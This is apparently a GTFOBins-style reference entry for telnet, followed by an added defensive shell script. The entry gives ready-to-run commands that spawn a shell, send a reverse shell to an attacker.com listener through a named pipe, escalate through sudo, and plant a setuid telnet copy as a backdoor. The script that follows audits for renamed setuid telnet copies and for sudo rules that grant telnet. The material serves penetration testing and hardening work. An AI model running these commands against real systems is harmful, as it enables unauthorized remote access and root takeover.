It can be used to break out from restricted environments by spawning an interactive system shell.
BSD version only, and the session must already be connected: ^] (Ctrl+]) is the telnet escape key that returns to the telnet> prompt, and the ! command there runs the given program, here a shell.
RHOST=attacker.com
RPORT=12345
telnet $RHOST $RPORT
^]
!/bin/sh
It can send back a reverse shell to a listening attacker to open remote network access. Run nc -l -p 12345 on the attacker box to receive the shell. The named pipe carries the attacker's input from telnet into sh and sh's output back into telnet, so the socket becomes both stdin and stdout of the shell.
RHOST=attacker.com
RPORT=12345
TF=$(mktemp -u)
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo.
BSD version only. Needs to be connected first.
RHOST=attacker.com
RPORT=12345
sudo telnet $RHOST $RPORT
^]
!/bin/sh
It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges, working as a SUID backdoor. If it is used to run commands, this only works on systems like Debian whose default sh keeps the elevated effective UID; where sh is bash, the shell drops the effective UID when it differs from the real one unless it is started with -p, so on such systems the escape below needs to be !/bin/sh -p.
BSD version only. Needs to be connected first.
sudo sh -c 'cp $(which telnet) .; chmod +s ./telnet'
RHOST=attacker.com
RPORT=12345
./telnet $RHOST $RPORT
^]
!/bin/sh
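The two privileged paths above depend on a sudo rule that names telnet and on a SUID copy of the binary (which the attacker may rename after copying). The following POSIX sh helpers are an added defensive check written for this page, not part of the GTFOBins entry or of telnet itself: one walks a filesystem root and reports every setuid file whose contents match a reference telnet binary, so renamed copies are caught; the other reads sudo -l style output from stdin and prints the rules that grant telnet (or ALL). Paths and the reference binary are the caller's; the rule lines in the usage comment are constructed examples.

```sh
#!/bin/sh
# Added audit helpers (not GTFOBins code). Hypothetical names:
# find_suid_copies, sudo_rules_for_telnet.

# Print every regular file under $1 (one filesystem, -xdev) that has the
# setuid bit and is byte-for-byte identical to the reference binary $2.
# Comparing contents rather than names catches a copy such as /tmp/.x that
# was staged with "cp $(which telnet) .; chmod +s ./telnet" and then renamed.
find_suid_copies() {
    root=$1
    ref=$2
    find "$root" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r f; do
        if cmp -s "$f" "$ref"; then
            printf '%s\n' "$f"
        fi
    done
}

# Read "sudo -l"-style rule lines on stdin, e.g.
#     (ALL) NOPASSWD: /usr/bin/nc, /usr/bin/telnet
#     (root) /usr/bin/telnetd
# and print each line that grants telnet by basename, or grants ALL.
# The (runas) prefix and tags such as NOPASSWD: or SETENV: are stripped,
# the remaining comma-separated commands are examined one by one, and only
# the command word (not its arguments) is compared, so telnetd is not matched.
sudo_rules_for_telnet() {
    awk '
        /^[ \t]*\(/ {
            line = $0
            sub(/^[ \t]*\([^)]*\)[ \t]*/, "", line)   # drop "(runas)"
            gsub(/[A-Z]+:[ \t]*/, "", line)            # drop NOPASSWD: etc.
            n = split(line, cmds, /[ \t]*,[ \t]*/)
            for (i = 1; i <= n; i++) {
                split(cmds[i], w, /[ \t]+/)
                c = w[1]
                sub(/.*\//, "", c)                      # basename only
                if (c == "telnet" || c == "ALL") { print $0; break }
            }
        }'
}

# Usage (run as root for a real sweep):
#   find_suid_copies / /usr/bin/telnet
#   sudo -l 2>/dev/null | sudo_rules_for_telnet
```

A hit from either function is not proof of compromise by itself (a distribution may legitimately ship telnet without setuid, and an admin may have granted it on purpose), but a setuid file matching telnet outside the package manager's paths, or a sudo rule that hands out telnet without restricting arguments, is exactly the precondition the Sudo and SUID sections above need.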